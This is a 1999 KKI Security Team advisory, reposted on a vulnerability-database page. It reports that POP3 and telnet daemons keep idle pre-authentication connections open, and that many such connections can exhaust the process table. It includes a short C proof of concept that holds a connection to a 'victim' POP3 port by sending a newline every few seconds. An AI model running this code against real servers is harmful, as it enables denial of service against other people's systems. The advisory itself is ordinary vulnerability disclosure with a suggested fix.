Lucene search
K

kki.inactive.connections.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 38 Views

Security report on flaws in mechanisms preventing parasitic connections in various network services.

Code
`Date: Wed, 28 Apr 1999 13:59:28 +0200  
From: Lukasz Luzar <[email protected]>  
To: [email protected]  
Subject: KKIS.28041999.002.b  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
### ### ### ### ###  
### ### ### ### ###  
###### ###### ###  
### ### ### ### ###  
### ### ### ### ###  
  
S E C U R I T Y  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
KKI Security Team Cracow Commercial Internet  
http://www.security.kki.pl http://www.kki.pl  
mailto:[email protected] mailto:[email protected]  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Raport title : Flaws in implementations of mechanisms which  
prevents from maintaining the parasitize connections  
in many tcp network services.  
Problem found by : Lukasz Luzar ([email protected])  
Raport created by : Robert Pajak ([email protected])  
Lukasz Luzar ([email protected])  
Raport published : 28 April 1999  
Raport code : KKIS.28041999.002.b  
Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...  
Systems affected : Linux, FreeBSD, Solaris, ...  
Archive : http://www.security.kki.pl/advisories/  
Risk level : low  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
The designers of many popular network services are trying to make the  
mechanisms which should prevents from maintaining the parasitize connections  
to their programs.  
The exercise of such protection is timeout, which closes inactive  
connections.  
But some of those designers forgets that some malicious guys may often  
and fraquently send strings full of bad or null commands to the open port  
of the service. Such situation might happen before login/password  
authentication of the connection.  
Those programmers should implement additional mechanisms to prevent such  
situations. Good solution is to put counter of bad (or null) commands  
inside the program.  
  
For example, the similiar mechanism has been applied in sendmail.  
This soluition is effective and very easy to implement.  
  
Lack of this mechanism may be quite threateing, because most of that tcp  
services are working with root privilages, and the bounds of amount of root  
proceses isn't easy, when the service has no internal bound.  
That affects whole system, when proccess table is fulfiled for  
example by multiply open connections to the vulnerable tcp service.  
  
Worst situation is, when vulnerable service doesn't logs any information  
about connection before authentication with login/password.  
One of this most vulnerable services is cucipop.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Below example shows how to open and maintain the connection,  
which might state open by undefined time.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
--- CUT HERE ---  
/*  
* example.c by Lukasz Luzar ([email protected])  
*/  
  
#include <stdio.h>  
#include <unistd.h>  
#include <string.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
  
/* victim's address and port of service */  
#define ADDR "10.0.0.1" //IP in dot natation  
#define PORT 110 //e.g. some pop3  
#define DELAY 4 //(4 secs.) how often we are sending bad commands  
#define COMMAND "\n" //some bad (or null) command  
  
void main()  
{  
int sockfd,  
j,k;  
struct sockaddr_in victim_addr;  
  
bzero((char *) &victim_addr, sizeof( victim_addr));  
  
victim_addr.sin_family = AF_INET;  
victim_addr.sin_addr.s_addr = inet_addr( ADDR);  
victim_addr.sin_port = htons( PORT);  
  
if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0)  
fprintf( stderr, "socket error\n");  
  
if( connect( sockfd,(struct sockaddr*) &victim_addr,  
sizeof( victim_addr)) < 0)  
fprintf( stderr,"connect error\n");  
  
k = 1;  
if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)  
fprintf( stderr,"setsockopt error\n");  
  
j = strlen( COMMAND);  
  
for(;;) {  
if( write( sockfd,COMMAND,j) == -1)  
fprintf( stderr,"write error\n");  
fprintf( stderr,".");  
sleep( DELAY);  
}  
  
}  
--- CUT HERE ---  
  
~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Copyright (c) 1999 KKI Security Team, Poland  
All rights reserved.  
  
All questions please address to mailto:[email protected]  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation